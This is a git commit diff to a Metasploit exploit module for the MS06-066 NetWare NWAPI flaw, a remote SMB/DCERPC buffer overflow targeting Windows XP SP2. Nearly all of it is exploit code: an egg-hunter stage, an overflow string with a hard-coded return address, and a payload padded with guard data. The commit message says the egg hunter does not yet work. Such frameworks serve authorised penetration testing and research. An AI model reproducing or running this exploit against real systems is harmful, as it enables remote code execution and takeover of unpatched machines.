Much closer, but the egg hunter never seems to find the eggs :(

git-svn-id: file:///home/svn/framework3/trunk@4158 4d416f70-5f16-0410-b530-b9f4589650da
unstable
pusscat 2006-12-01 16:39:25 +00:00
parent dc0ad61c85
commit c619cc6a12
1 changed files with 26 additions and 6 deletions


@ -4,6 +4,7 @@ module Msf
class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
include Exploit::Remote::Egghunter
include Exploit::Remote::DCERPC include Exploit::Remote::DCERPC
include Exploit::Remote::SMB include Exploit::Remote::SMB
@ -30,7 +31,7 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
'Privileged' => true, 'Privileged' => true,
'Payload' => 'Payload' =>
{ {
'Space' => 1000, 'Space' => 296,
'BadChars' => "", 'BadChars' => "",
'Compat' => 'Compat' =>
{ {
@ -44,7 +45,8 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
[ [
'Windows XP SP2', 'Windows XP SP2',
{ {
'Ret' => 0x0BADB0D0 , #'Ret' => 0x0BADB0D0 ,
'Ret' => 0x00EBEEEC ,
}, },
] ]
], ],
@ -65,14 +67,32 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
# [in, out] long # [in, out] long
# [out] handle # [out] handle
ofstring = Rex::Text.to_unicode('\\\\') + "A"*296 + [ target.ret ].pack('V') + "\x00\x00" # greater than 512 bytes # Generate the egghunter payload
hunter = generate_egghunter()
egg = hunter[1]
#print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}")
# Add giant blocks of guard data before and after the egg
eggdata =
Rex::Text.rand_text(1024) +
egg +
egg +
payload.encoded +
Rex::Text.rand_text(1024)
buflen = 295
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + Rex::Text.rand_text(buflen-hunter[0].length) +
[ target.ret ].pack('V') + "\x00"
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
stubdata = stubdata =
NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString("\\\\BBBB") + NDR.UnicodeConformantVaryingString("\\\\BBBB") +
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE!
#NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") +
NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) +
NDR.long((ofstring.length * 2) + 0xC) + NDR.long(rand(0xffffffff)) +
#NDR.long((ofstring.length * 2) + 0xC) +
eggdata